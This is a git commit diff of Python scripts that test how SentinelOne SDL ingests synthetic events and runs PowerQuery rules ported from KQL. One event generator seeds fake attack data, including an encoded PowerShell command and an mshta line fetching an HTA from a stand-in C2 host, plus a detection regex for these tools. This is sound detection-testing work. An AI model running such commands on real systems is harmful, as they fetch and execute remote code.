Initial commit: KQL ↔ SDL PowerQuery proof of equivalence

2026-06-13 07:11:17 +00:00 · 2026-06-01 09:57:14 +02:00
commit 23cbaa9c08
91 changed files with 5966 additions and 0 deletions
@@ -0,0 +1,34 @@
+#!/usr/bin/env python3
+"""Count duplicate timestamps within the generated JSONL.
+
+SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
+within the same session are silently dropped. If our generator emits many
+events at colliding ts_epoch_ms values, only one of each cluster survives.
+"""
+import json
+from collections import Counter, defaultdict
+from pathlib import Path
+
+JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"
+
+per_type_total = Counter()
+per_type_unique = defaultdict(set)
+per_type_max_collision = defaultdict(int)
+with JSONL.open() as f:
+    for line in f:
+        r = json.loads(line)
+        et = r["event_type"]
+        ts = r["ts_epoch_ms"]
+        per_type_total[et] += 1
+        per_type_unique[et].add(ts)
+
+print(f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}")
+print("-" * 70)
+for et in sorted(per_type_total):
+    n = per_type_total[et]
+    u = len(per_type_unique[et])
+    loss = 100 * (n - u) / n if n else 0
+    print(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
+print("-" * 70)
+print(f"{'TOTAL':30s} {sum(per_type_total.values()):>8} "
+      f"{sum(len(s) for s in per_type_unique.values()):>8}")
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""Diagnose why most of our 445 generated events are not queryable in SDL.
+
+Strategy:
+  1. Take 5 CommonSecurityLog events straight from the generated JSONL,
+     decorate them with a unique probe marker, and ingest as a single batch.
+  2. Wait 10 s for indexing.
+  3. Query for the marker to confirm they are queryable.
+  4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
+     vs counts in the local file - to expose where the loss happens.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+from collections import Counter
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs  # noqa: E402
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+MARKER = f"loss-probe-{int(time.time())}"
+
+# ---------------------------------------------------------------------------
+# Step 1: per-type counts in the local file
+# ---------------------------------------------------------------------------
+local_counts = Counter()
+with JSONL.open() as f:
+    for line in f:
+        rec = json.loads(line)
+        local_counts[rec["event_type"]] += 1
+
+print("=" * 80)
+print("Local JSONL event_type counts")
+print("=" * 80)
+for k, v in sorted(local_counts.items()):
+    print(f"  {k:30s} {v}")
+print(f"  {'TOTAL':30s} {sum(local_counts.values())}")
+
+# ---------------------------------------------------------------------------
+# Step 2: pick 5 CSL events from disk, mark them, ingest, query
+# ---------------------------------------------------------------------------
+csl_events = []
+with JSONL.open() as f:
+    for line in f:
+        rec = json.loads(line)
+        if rec["event_type"] == "CommonSecurityLog":
+            rec["loss_marker"] = MARKER
+            ts_ms = int(rec["ts_epoch_ms"])
+            cleaned = _clean_attrs(rec)
+            csl_events.append({"ts": str(ts_ms * 1_000_000), "sev": 3,
+                               "thread": "T1", "attrs": cleaned})
+            if len(csl_events) >= 5:
+                break
+
+print()
+print("=" * 80)
+print(f"Step 2: ingesting 5 marker-tagged CSL events ({MARKER})")
+print("=" * 80)
+r = add_events(csl_events)
+print(f"addEvents -> {json.dumps(r)}")
+print("waiting 10 s for indexing ...")
+time.sleep(10)
+
+probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
+r = power_query(probe_q, "1h")
+print(f"probe query (1h) -> matching={r.get('matchingEvents')}, rows={r.get('values')}")
+
+# ---------------------------------------------------------------------------
+# Step 3: full bulk ingest of the file via the harness helper
+# ---------------------------------------------------------------------------
+print()
+print("=" * 80)
+print("Step 3: full bulk ingest of every event in JSONL")
+print("=" * 80)
+sent = ingest_jsonl(JSONL)
+print(f"ingest_jsonl reports {sent} events sent")
+print("waiting 20 s for indexing ...")
+time.sleep(20)
+
+# ---------------------------------------------------------------------------
+# Step 4: per-event-type count in SDL
+# ---------------------------------------------------------------------------
+print()
+print("=" * 80)
+print("Step 4: SDL counts by event_type")
+print("=" * 80)
+print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
+print("-" * 60)
+for et in sorted(local_counts):
+    q = f"event_type='{et}' | group n = count()"
+    r = power_query(q, "1h")
+    sdl_n = 0
+    if r.get("values"):
+        sdl_n = int(r["values"][0][0] or 0)
+    local_n = local_counts[et]
+    loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
+    print(f"{et:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+"""Probe what data is actually queryable in SDL after ingestion."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from harness.sdl_client import power_query  # noqa: E402
+
+QUERIES = [
+    ("any serverHost=kql-proof",
+     "serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5"),
+    ("count by event_type",
+     "serverHost='kql-proof' | group n=count() by event_type"),
+    ("SigninLogs by user",
+     "serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName"),
+    ("SigninLogs min/max ts_epoch_ms",
+     "serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
+    ("recent SigninLogs (no time filter)",
+     "serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10"),
+    ("SecurityEvent EventID column type",
+     "serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5"),
+    ("Audit OperationName",
+     "serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10"),
+]
+
+for name, q in QUERIES:
+    print("=" * 80)
+    print(f"# {name}")
+    print(f"  query: {q}")
+    t = time.time()
+    r = power_query(q, start_time="30d")
+    rows = r.get("values") or []
+    cols = [c.get("name") if isinstance(c, dict) else c
+            for c in (r.get("columns") or [])]
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} "
+          f"rows={len(rows)} took={time.time()-t:.1f}s")
+    if r.get("status", "").startswith("error/"):
+        print(f"  ERROR_BODY: {json.dumps(r, indent=2)[:800]}")
+    if rows:
+        print(f"  cols: {cols}")
+        for row in rows[:5]:
+            print("    ", dict(zip(cols, row)))
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Wider probe: try a variety of filters and start windows to find our data."""
+import sys, time, json
+from pathlib import Path
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from harness.sdl_client import power_query
+
+QUERIES = [
+    ("event_type=SigninLogs 7d (no serverHost)",
+     "event_type='SigninLogs' | columns UserPrincipalName | limit 5", "7d"),
+    ("event_type=SigninLogs 1h",
+     "event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5", "1h"),
+    ("UserPrincipalName matching contoso",
+     "UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5", "1d"),
+    ("anything from xdr tenant 1h",
+     "* | columns event_type, serverHost, logfile | limit 5", "1h"),
+    ("logfile contains kql-proof",
+     "logfile contains 'kql-proof' | columns event_type | limit 5", "7d"),
+    ("contoso.com in attrs",
+     "Identity contains 'contoso.com' | columns event_type, Identity | limit 5", "1d"),
+    ("test: count any events tenant-wide 5m",
+     "* | group n=count()", "5m"),
+]
+
+for name, q, window in QUERIES:
+    print("=" * 80)
+    print(f"# {name}  (start={window})")
+    print(f"  q: {q}")
+    t = time.time()
+    r = power_query(q, start_time=window)
+    rows = r.get("values") or []
+    cols = [c.get("name") if isinstance(c, dict) else c
+            for c in (r.get("columns") or [])]
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} "
+          f"rows={len(rows)} took={time.time()-t:.1f}s")
+    if r.get("status", "").startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:500]}")
+    if rows:
+        for row in rows[:5]:
+            print("    ", dict(zip(cols, row)))
@@ -0,0 +1,198 @@
+#!/usr/bin/env python3
+"""Export each rule's KQL and PowerQuery to disk.
+
+The exported `.pq` files are:
+  * SELF-CONTAINED and RUNNABLE — every template placeholder
+    (`{RECENT_MS}`) is substituted with a concrete value from the
+    current time anchor, so you can paste straight into SDL.
+  * PRETTY-PRINTED — one pipeline stage per line with continuation
+    indents, matching the style in pmoses-s1/claude-skills.
+  * HEADER-DECORATED — a `//`-comment block names the rule, describes
+    intent, lists field references, and tells the reader what
+    `startTime` to use when running the query.
+  * VALIDATED — after writing, every `.pq` is parsed for known
+    anti-patterns from the SentinelOne PowerQuery skill's pitfalls
+    list (literal `{` braces, deprecated `first()`/`last()`/
+    `percentile()`, leading `*` filter, missing leading pipe before
+    `join`/`union`, etc.). Errors abort the export so the published
+    repo never contains broken queries.
+"""
+from __future__ import annotations
+
+import json
+import re
+import sys
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from rules import RULES, NOW, RECENT_START, BASELINE_START  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
+# ---------------------------------------------------------------------------
+def pretty(pq: str) -> str:
+    """Break a one-line PQ into idiomatic multi-line form.
+
+    Rule: every `|` that introduces a stage starts a new line; multi-clause
+    `group ... by ...` is split so each agg sits on its own indented line
+    and `by ...` lines up under `group`.
+    """
+    # Normalise whitespace
+    pq = re.sub(r"\s+", " ", pq).strip()
+
+    # Split on " | " into stages, but keep the leading initial filter
+    parts = pq.split(" | ")
+    head, stages = parts[0].strip(), [s.strip() for s in parts[1:]]
+
+    lines: list[str] = [head] if head else []
+    for s in stages:
+        # Break a long `group a=count(), b=sum(x) by f1, f2` into multi-line.
+        m = re.match(
+            r"^group\s+(.+?)\s+by\s+(.+)$", s, flags=re.IGNORECASE | re.DOTALL)
+        if m:
+            aggs_raw, bys = m.group(1), m.group(2)
+            # Split aggs on commas NOT inside parentheses
+            aggs = _split_top_level_commas(aggs_raw)
+            lines.append("| group " + aggs[0].strip() + ("," if len(aggs) > 1 else ""))
+            for a in aggs[1:-1]:
+                lines.append("        " + a.strip() + ",")
+            if len(aggs) > 1:
+                lines.append("        " + aggs[-1].strip())
+            lines.append("    by " + bys.strip())
+            continue
+
+        # Default: one stage per line
+        lines.append("| " + s)
+
+    return "\n".join(lines)
+
+
+def _split_top_level_commas(s: str) -> list[str]:
+    out: list[str] = []
+    depth, cur = 0, []
+    for ch in s:
+        if ch == "(":
+            depth += 1; cur.append(ch)
+        elif ch == ")":
+            depth -= 1; cur.append(ch)
+        elif ch == "," and depth == 0:
+            out.append("".join(cur)); cur = []
+        else:
+            cur.append(ch)
+    if cur:
+        out.append("".join(cur))
+    return out
+
+
+# ---------------------------------------------------------------------------
+# Anti-pattern scanner — refuses to write a file containing known landmines.
+# ---------------------------------------------------------------------------
+PITFALLS: list[tuple[str, str]] = [
+    (r"\{[A-Za-z_]+\}",
+     "Unsubstituted template placeholder (e.g. {RECENT_MS}). "
+     "Substitute before writing."),
+    (r"\bfirst\s*\(",
+     "first(x) is unreliable — use min_by(x, ts_epoch_ms)."),
+    (r"\blast\s*\(",
+     "last(x) is unreliable — use max_by(x, ts_epoch_ms)."),
+    (r"\bpercentile\s*\(",
+     "percentile(x, N) is not a real function — use p50/p95/p99."),
+    (r"\bgroup_unique_values\s*\(",
+     "group_unique_values does not exist — use array_agg_distinct(x, N)."),
+    (r"(?m)^\s*\*\s*(\||$)",
+     "Bare `*` as initial filter returns 500 — use `| limit 5` or "
+     "`field = *`."),
+    (r"(?m)^\s*(join|union)\b",
+     "join/union must start with a leading `|`."),
+    (r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
+     "Shortcut fields (#cmdline, …) are unreliable across tenants — "
+     "use the explicit field name."),
+]
+
+
+def scan(text: str) -> list[str]:
+    return [msg for pat, msg in PITFALLS if re.search(pat, text)]
+
+
+# ---------------------------------------------------------------------------
+# Header builder
+# ---------------------------------------------------------------------------
+def header(rule: dict, recent_iso: str, now_iso: str) -> str:
+    field_refs = sorted({f for f in re.findall(
+        r"\b[A-Z][A-Za-z0-9_]+\b", rule["pq"])
+        if f.lower() not in {"and", "or", "not", "true", "false",
+                              "filter", "group", "by", "let", "columns",
+                              "sort", "limit", "join", "union", "in",
+                              "contains", "matches"}})
+    lines = [
+        f"// Rule: {rule['id']}",
+        f"// {rule['description']}",
+        f"//",
+        "// Source KQL: see ../kql/" + rule['id'] + ".kql",
+        "//",
+        "// HOW TO RUN",
+        "//   curl POST {sdl}/api/powerQuery with this body, OR paste in",
+        "//   the SDL console. Set startTime = '2h' (or wider) so the API",
+        "//   scans the freshly-ingested epochs that contain the events.",
+        "//",
+        f"// Time anchor at export: NOW = {now_iso}",
+        f"// Recent-window cutoff:  {recent_iso}",
+        "//   (`ts_epoch_ms` below is that cutoff expressed in ms.",
+        "//   Re-run harness/export_rules.py to refresh after regenerating",
+        "//   sample_data/events.jsonl.)",
+        "//",
+        "// Fields referenced: " + ", ".join(field_refs[:10])
+        + ("…" if len(field_refs) > 10 else ""),
+        "//",
+        "// EDITING NOTE",
+        "//   Every line that starts with `|` is a pipeline stage. Each `|`",
+        "//   is REQUIRED. If you delete one (e.g. while changing a literal",
+        "//   on the same line as a stage), SDL re-parses the keyword that",
+        "//   follows as a search term and rejects the query with errors",
+        "//   like `'estimate_distinct' is a grouping function`.",
+    ]
+    return "\n".join(lines) + "\n"
+
+
+# ---------------------------------------------------------------------------
+# Main
+# ---------------------------------------------------------------------------
+def main() -> None:
+    recent_ms = int(RECENT_START.timestamp() * 1000)
+    recent_iso = RECENT_START.isoformat()
+    now_iso = NOW.isoformat()
+
+    failures: list[tuple[str, list[str]]] = []
+    for r in RULES:
+        # 1. substitute placeholders
+        body = r["pq"].replace("{RECENT_MS}", str(recent_ms))
+        # 2. pretty-print
+        body = pretty(body)
+        # 3. scan
+        bad = scan(body)
+        if bad:
+            failures.append((r["id"], bad))
+            continue
+        # 4. write
+        text = header(r, recent_iso, now_iso) + "\n" + body + "\n"
+        (ROOT / "pq" / f"{r['id']}.pq").write_text(text)
+
+        # Mirror the .kql (verbatim, no substitution)
+        (ROOT / "kql" / f"{r['id']}.kql").write_text(r["kql"].strip() + "\n")
+
+    if failures:
+        print("✗ Export failed — anti-patterns detected:")
+        for rid, msgs in failures:
+            print(f"  {rid}")
+            for m in msgs:
+                print(f"    - {m}")
+        sys.exit(1)
+
+    print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
+    print(f"  (RECENT_MS = {recent_ms} = {recent_iso})")
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+"""Find SDL's age cutoff for addEvents by sending probe events at increasing
+ages and seeing which ones become queryable."""
+import json, sys, time, uuid
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import add_events, power_query
+
+TS_NOW_MS = int(time.time() * 1000)
+PROBE = uuid.uuid4().hex[:8]
+
+# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
+ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]
+events = []
+for i, age in enumerate(ages_min):
+    ts_ms = TS_NOW_MS - int(age * 60 * 1000)
+    events.append({
+        "ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
+        "attrs": {"event_type": "CommonSecurityLog",
+                  "probe": f"{PROBE}_{i:02d}", "age_min": age},
+    })
+
+print(f"Sending {len(events)} events at ages {ages_min} min")
+r = add_events(events)
+print(f"addEvents -> {json.dumps(r)}")
+
+print("\nWaiting 12 s ...")
+time.sleep(12)
+
+print(f"\nQuerying probe '{PROBE}' over last 48h ...")
+res = power_query(f"probe contains '{PROBE}' | columns probe, age_min | limit 100", "48h")
+n = res.get("matchingEvents", 0)
+vals = res.get("values") or []
+print(f"matching={n}")
+got = {row[1] for row in vals}
+print(f"\n{'age_min':>8}  {'sent':>6}  {'queryable':>10}")
+for age in ages_min:
+    landed = "YES" if age in got else "NO"
+    print(f"  {age:>6}     {'yes':>6}  {landed:>10}")
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Send one event per batch (separate addEvents call) at different ages,
+each with a fresh session. This isolates whether SDL is rejecting based on
+mixed-age batches or just on event age."""
+import json, sys, time, uuid, importlib
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+
+PROBE = uuid.uuid4().hex[:8]
+ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]
+
+# Force a fresh session for *every* probe so we eliminate session dedup
+import harness.sdl_client as sdl
+
+results = []
+for i, age in enumerate(ages_min):
+    importlib.reload(sdl)         # re-roll the SESSION UUID
+    ts_ms = int(time.time() * 1000) - int(age * 60 * 1000)
+    pv = f"{PROBE}_{i:02d}"
+    ev = {"ts": str(ts_ms * 1_000_000), "sev": 3, "thread": "T1",
+          "attrs": {"event_type": "CommonSecurityLog", "probe": pv,
+                    "age_min": age}}
+    r = sdl.add_events([ev])
+    print(f"age={age:>6} min  session={sdl.SESSION[-12:]}  addEvents={r}")
+    results.append((age, pv))
+
+print("\nWaiting 12 s ...")
+time.sleep(12)
+
+q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
+res = sdl.power_query(q, "48h")
+n = res.get("matchingEvents", 0)
+vals = res.get("values") or []
+print(f"\nQuery matching={n}")
+got = {row[1] for row in vals}
+print(f"\n{'age_min':>8}  {'queryable':>10}")
+for age, _ in results:
+    landed = "YES" if age in got else "NO"
+    print(f"  {age:>6}     {landed:>10}")
@@ -0,0 +1,220 @@
+"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
+
+  identity sign_in failures  x  suspicious DNS  x  suspicious process_start
+
+Joined on (user_name) and (host). Events are spread across the last 4 hours.
+"""
+from __future__ import annotations
+
+import random
+import time
+from pathlib import Path
+import sys
+
+ROOT = Path(__file__).resolve().parent
+sys.path.insert(0, str(ROOT))
+from sdl_client import add_events, power_query  # noqa: E402
+
+NOW_MS = int(time.time() * 1000)
+WINDOW_MS = 4 * 60 * 60 * 1000  # 4h
+
+# --- Personas that will land in ALL 3 streams (these will join) --------------
+JOIN_TARGETS = [
+    # (user, host)
+    ("alice.smith",   "wks-alice-01"),
+    ("bob.jones",     "wks-bob-02"),
+    ("carol.nguyen",  "wks-carol-03"),
+]
+
+# Users that only fail logins (no DNS/proc match)  → in failed-only
+NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
+
+# Hosts that have suspicious procs but no DNS hit → noise on proc side
+NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
+
+SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
+BENIGN_DOMAINS  = ["microsoft.com", "google.com", "github.com"]
+SUSPECT_CMDS = [
+    "powershell.exe -enc SQBFAFgAIA==",
+    "rundll32.exe shell32.dll,Control_RunDLL",
+    "mshta.exe http://c2.example.net/x.hta",
+]
+BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
+
+
+def rand_ts() -> str:
+    """Random ns-epoch timestamp string within the last 4h."""
+    ms = NOW_MS - random.randint(0, WINDOW_MS - 1)
+    return str(ms * 1_000_000)
+
+
+def evt(ts_ns: str, attrs: dict) -> dict:
+    return {"ts": ts_ns, "sev": 3, "attrs": attrs, "thread": "T1"}
+
+
+def gen_failed_signins() -> list[dict]:
+    out = []
+    # Users in JOIN_TARGETS get many failures (so they "stand out")
+    for user, _ in JOIN_TARGETS:
+        for _ in range(random.randint(8, 15)):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "identity",
+                "dataSource.vendor":   "azure-ad",
+                "activity_name":       "sign_in",
+                "status":              "failure",
+                "user.name":           user,
+                "src_endpoint.ip":     f"203.0.113.{random.randint(2,254)}",
+            }))
+    # Noise: failed-only users
+    for user in NOISE_FAILED_USERS:
+        for _ in range(random.randint(2, 6)):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "identity",
+                "dataSource.vendor":   "azure-ad",
+                "activity_name":       "sign_in",
+                "status":              "failure",
+                "user.name":           user,
+            }))
+    # Some successes (should be filtered out by status='failure')
+    for user, _ in JOIN_TARGETS:
+        for _ in range(3):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "identity",
+                "dataSource.vendor":   "azure-ad",
+                "activity_name":       "sign_in",
+                "status":              "success",
+                "user.name":           user,
+            }))
+    return out
+
+
+def gen_dns() -> list[dict]:
+    out = []
+    for user, host in JOIN_TARGETS:
+        # suspicious DNS for these users on their hosts
+        for _ in range(random.randint(3, 6)):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "network",
+                "dataSource.vendor":   "zeek",
+                "activity_name":       "dns_query",
+                "user.name":           user,
+                "device.hostname":     host,
+                "dns.question.name":   random.choice(SUSPECT_DOMAINS),
+            }))
+        # benign DNS noise from same users
+        for _ in range(5):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "network",
+                "dataSource.vendor":   "zeek",
+                "activity_name":       "dns_query",
+                "user.name":           user,
+                "device.hostname":     host,
+                "dns.question.name":   random.choice(BENIGN_DOMAINS),
+            }))
+    # Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
+    for user in ["greg.wu", "helen.park"]:
+        for _ in range(3):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "network",
+                "dataSource.vendor":   "zeek",
+                "activity_name":       "dns_query",
+                "user.name":           user,
+                "device.hostname":     f"wks-{user.split('.')[0]}-99",
+                "dns.question.name":   random.choice(SUSPECT_DOMAINS),
+            }))
+    return out
+
+
+def gen_process() -> list[dict]:
+    out = []
+    for _, host in JOIN_TARGETS:
+        for _ in range(random.randint(4, 8)):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "process",
+                "dataSource.vendor":   "sentinelone",
+                "activity_name":       "process_start",
+                "device.hostname":     host,
+                "process.cmd_line":    random.choice(SUSPECT_CMDS),
+            }))
+        # benign procs on the same hosts
+        for _ in range(5):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "process",
+                "dataSource.vendor":   "sentinelone",
+                "activity_name":       "process_start",
+                "device.hostname":     host,
+                "process.cmd_line":    random.choice(BENIGN_CMDS),
+            }))
+    # Noise: suspicious procs on hosts that don't appear in DNS stream
+    for host in NOISE_PROC_HOSTS:
+        for _ in range(3):
+            out.append(evt(rand_ts(), {
+                "dataSource.category": "process",
+                "dataSource.vendor":   "sentinelone",
+                "activity_name":       "process_start",
+                "device.hostname":     host,
+                "process.cmd_line":    random.choice(SUSPECT_CMDS),
+            }))
+    return out
+
+
+def chunked(seq: list, n: int):
+    for i in range(0, len(seq), n):
+        yield seq[i:i + n]
+
+
+def main() -> None:
+    random.seed(42)
+    events = gen_failed_signins() + gen_dns() + gen_process()
+    random.shuffle(events)
+    print(f"Generated {len(events)} events across the last 4h")
+
+    sent = 0
+    for batch in chunked(events, 200):
+        r = add_events(batch, session_info={
+            "serverHost": "join-demo",
+            "logfile":    "join-demo.jsonl",
+            "parser":     "json",
+        })
+        if r.get("status") != "success":
+            raise RuntimeError(f"addEvents failed: {r}")
+        sent += len(batch)
+        print(f"  ingested {sent}/{len(events)}")
+        time.sleep(0.25)
+    print(f"Done. {sent} events ingested.")
+
+    # Quick verification: run the user's PowerQuery against last 4h
+    pq = r'''| join
+    failed = (
+      dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
+      | columns user_name = user.name
+      | group failed_signins = count() by user_name
+    ),
+    dns = (
+      dataSource.category = 'network' AND activity_name = 'dns_query'
+      AND dns.question.name matches "(c2|suspect)\.example\."
+      | columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
+    ),
+    proc = (
+      dataSource.category = 'process' AND activity_name = 'process_start'
+      AND process.cmd_line matches "(powershell|rundll32|mshta)"
+      | columns host = device.hostname, cmd_line = process.cmd_line
+    )
+    on failed.user_name = dns.user_name, dns.host = proc.host'''
+
+    print("\nWaiting 20s for SDL indexing, then running the join...")
+    time.sleep(20)
+    res = power_query(pq, start_time="4h")
+    if isinstance(res, dict):
+        matches = res.get("matches") or res.get("data") or res.get("results")
+        print(f"PowerQuery response keys: {list(res.keys())}")
+        if matches is not None:
+            print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
+        else:
+            print(res)
+    else:
+        print(res)
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+"""After bash run_proof.sh, check what's queryable for the latest run."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+# Look at the latest proof_run_id from the log
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+m = re.search(r"proof_run_id=([A-Za-z0-9-]+)", log)
+RUN_ID = m.group(1) if m else None
+print(f"Latest proof_run_id from log: {RUN_ID}")
+
+QUERIES = [
+    "any event for this run",
+    f"proof_run_id='{RUN_ID}' | group n=count()",
+    "by event_type for this run",
+    f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
+    "all kql-proof logfile (any run)",
+    "logfile contains 'kql-proof' | group n=count() by event_type",
+    "rule 1 raw query that errors",
+    f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
+    "| group LocationCount = estimate_distinct(Location), "
+    "LocationList = group_unique_values(Location), LogonCount = count() "
+    "by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
+]
+
+for label_or_q in zip(QUERIES[0::2], QUERIES[1::2]):
+    label, q = label_or_q
+    print()
+    print("=" * 80)
+    print(f"# {label}")
+    print(f"  q: {q}")
+    t = time.time()
+    r = power_query(q, "1h")
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
+    if r.get("status", "").startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:600]}")
+    for row in (r.get("values") or [])[:10]:
+        cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
+        print("    ", dict(zip(cols, row)))
@@ -0,0 +1,92 @@
+#!/usr/bin/env python3
+"""Probe: does SDL index JSON keys that contain literal dots?
+
+If yes, we can ship synthetic OCSF events with keys like
+`"event.category": "logins"` and query them with the same dotted
+syntax the published runnable example uses, keeping the OCSF
+look-and-feel without needing a server-side parser to flatten
+nested objects.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import upload_logs, power_query  # noqa: E402
+
+
+def main() -> int:
+    run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
+    now = datetime.now(timezone.utc).replace(microsecond=0)
+    ts_ms = int((now - timedelta(seconds=30)).timestamp() * 1000)
+
+    e = {
+        "TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
+        "ts_epoch_ms": ts_ms,
+        "proof_run_id": run_id,
+        # literal dots in the key (NOT nested objects)
+        "event.category": "logins",
+        "event.login.userName": "alice@contoso.com",
+        "event.login.loginIsSuccessful": False,
+        "endpoint.name": "host-alpha",
+    }
+    r = upload_logs(json.dumps(e))
+    print("upload:", r.get("status"))
+
+    print("indexing", end="", flush=True)
+    n = 0
+    for _ in range(20):
+        time.sleep(2)
+        rr = power_query(f"proof_run_id='{run_id}' | group n=count()", "5m")
+        vals = rr.get("values") or []
+        n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
+        print(f" {n}", end="", flush=True)
+        if n >= 1:
+            break
+    print()
+
+    if n == 0:
+        print("event did not become queryable; aborting")
+        return 1
+
+    probes = [
+        ("filter event.category",
+         f"proof_run_id='{run_id}' AND event.category='logins' | limit 2"),
+        ("project event.category",
+         f"proof_run_id='{run_id}' | columns c=event.category | limit 2"),
+        ("project endpoint.name",
+         f"proof_run_id='{run_id}' | columns h=endpoint.name | limit 2"),
+        ("project event.login.userName",
+         f"proof_run_id='{run_id}' | columns u=event.login.userName | limit 2"),
+        ("filter event.login.loginIsSuccessful",
+         f"proof_run_id='{run_id}' AND event.login.loginIsSuccessful='false' | limit 2"),
+        ("bracket access",
+         f"proof_run_id='{run_id}' AND \"event.category\"='logins' | limit 2"),
+        ("see all top-level cols of one row",
+         f"proof_run_id='{run_id}' | limit 1"),
+    ]
+    for label, q in probes:
+        r = power_query(q, "5m")
+        status = r.get("status")
+        matching = r.get("matchingEvents")
+        msg = (r.get("message") or "")[:140]
+        print(f"\n[{label}]")
+        print(f"  q     : {q}")
+        print(f"  status: {status}  matching: {matching}  msg: {msg}")
+        cols = r.get("columns") or []
+        col_names = [c.get("name") if isinstance(c, dict) else c for c in cols]
+        print(f"  cols  : {col_names}")
+        for v in (r.get("values") or [])[:2]:
+            v_str = str(v)
+            print(f"  val   : {v_str[:200]}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
+manual one. Add a unique probe marker so we can tell whether it actually
+landed in SDL."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from harness.sdl_client import add_events, power_query, _clean_attrs  # noqa: E402
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+PROBE = uuid.uuid4().hex[:8]
+
+# Take the first 3 lines of JSONL, decorate with probe, send via the SAME
